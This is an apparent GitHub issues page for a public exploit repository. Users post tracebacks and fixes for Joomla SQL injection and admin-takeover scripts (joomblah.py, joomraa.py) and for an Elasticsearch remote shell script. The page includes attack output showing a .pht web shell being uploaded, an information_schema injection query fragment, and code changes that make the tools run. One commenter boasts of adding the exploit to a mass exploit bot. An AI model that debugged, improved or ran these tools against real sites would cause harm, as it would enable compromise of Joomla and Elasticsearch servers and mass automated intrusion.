xiphosresearch / exploits
Miscellaneous exploit code
Home Page: http://www.xiphosresearch.com/
Line 46 in 44bf14d
Line 46 needs to be fixed to: result += value.decode('utf-8')
It's been 6 months, no bug bounty pay-out, they stopped replying to my emails...
Have verified exploit works with latest version, one executable (the exploitable one) has same MD5 hash, the other executable has same hard-coded auth string.
People gotta know.
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[!] Admin Login Failure!
[-] Check email for activation code
[?] Press any key after activation
[email protected]
I am not getting any activation mail?
https://github.com/XiphosResearch/exploits/blob/master/Joomraa/joomraa.py
line 187: except Excption:
Changing it to except Exception: worked for me.
Thanks for sharing the exploit. It is super easy to use.
python joomblah.py http://10.xx.xx.xx.
Traceback (most recent call last):
File "joomblah.py", line 186, in <module>
sys.exit(main("http://IP:8080/joomla"))
File "joomblah.py", line 183, in main
pwn_joomla_again(options)
File "joomblah.py", line 147, in pwn_joomla_again
tables = extract_joomla_tables(options, sess, token)
File "joomblah.py", line 74, in extract_joomla_tables
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
File "joomblah.py", line 46, in joomla_370_sqli_extract
result += value
TypeError: can only concatenate str (not "bytes") to str
DoubtfullyMalignant.py
On v2.7 you get: ImportError: No module named socketserver
On v3.5 you get: SyntaxError: Missing parentheses in call to 'print'
Affected systems: Ubuntu Server and Windows 7
Please fix.
Bro, I added your exploit to my mass exploit bot and I made these modifications:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
and
resp = sess.get(options.url + "/index.php/component/users/?view=login", verify=False)
To take off the warning and SSL certificate check ;))
see ya
link: https://github.com/anarcoder/google_explorer/blob/beta_version/exploits/joomraa.py
I am getting this error when executing this exploit. It happens when the script is uploading the exploit. Host is running Joomla 3.6.3.
Should I be pointing the script to the login page or the home page?
thanks
root@kali:/tmp# ./joomra.py -u none -e [email protected] http://xxx.xxx.xxx.xxx
@@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@
@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@
@@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@!
!@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@
!!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@
!!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!!
!!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!!
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://xxx.xxx.xxx.xxx/images/FGIA7RIB7.pht
Traceback (most recent call last):
File "./joomra.py", line 249, in <module>
sys.exit(main("http://192.168.10.100:8080/joomla"))
File "./joomra.py", line 243, in main
if pwn_joomla(options):
File "./joomra.py", line 218, in pwn_joomla
return stage_two(options, sess)
File "./joomra.py", line 123, in stage_two
return upload_file(options, sess, image_path)
File "./joomra.py", line 141, in upload_file
resp = sess.post(upload_url, files=files, data=data, verify=False)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 535, in post
return self.request('POST', url, data=data, json=json, **kwargs)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 474, in request
prep = self.prepare_request(req)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 407, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "/usr/lib/python2.7/dist-packages/requests/models.py", line 305, in prepare
self.prepare_body(data, files, json)
File "/usr/lib/python2.7/dist-packages/requests/models.py", line 483, in prepare_body
(body, content_type) = self._encode_files(files, data)
File "/usr/lib/python2.7/dist-packages/requests/models.py", line 158, in _encode_files
fdata = fp.read()
AttributeError: 'NoneType' object has no attribute 'read'
python joom.py -u hacker -p password1 -e [email protected] http://website.com/joomla
@@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@
@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@
@@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@!
!@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@
!!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@
!!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!!
!!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!!
!!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: !:! :!: !:! :!:
::: : :: ::::: :: ::::: :: ::: :: :: ::: :: ::: :: ::: ::
: ::: : : : : : : : : : : : : : : : : : :::
[-] Getting token
[!] Cannot find CSRF token
[*] FAILURE
When running this script I get the message: Cannot find CSRF token
Does it mean that my website is not vulnerable?
After getting shell when I want to run my commands I got this error:
Traceback (most recent call last):
File "elastic_shell.py", line 56, in <module>
main(args=sys.argv)
File "elastic_shell.py", line 53, in main
exploit(target=args[1])
File "elastic_shell.py", line 47, in exploit
execute_command(target=target, command=cmd)
File "elastic_shell.py", line 36, in execute_command
fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
KeyError: 'hits'
Script stops after :-
[-] Fetching CSRF token
[-] Testing SQLi